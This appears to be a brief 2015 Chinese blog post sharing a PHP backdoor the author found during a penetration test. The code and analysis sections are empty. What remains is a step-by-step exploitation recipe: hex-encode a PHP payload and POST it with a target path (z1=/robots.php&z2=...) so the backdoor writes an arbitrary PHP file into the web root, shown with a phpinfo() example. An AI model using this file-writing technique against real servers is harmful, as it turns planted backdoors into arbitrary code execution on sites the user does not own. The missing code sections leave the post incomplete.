分享一款遇到的PHP后门 2015-10-16

这个后门是我在渗透某站时遇到的

代码

代码分析

利用方式

先把要写入的内容URL编码,比如:

编码后：
%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
然后去掉里面的百分号(%)得到：
3C3F70687020706870696E666F28293B203F3E
然后给我们的后门POST内容：
z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到我们的phpinfo已经写入到根目录下的robots.php: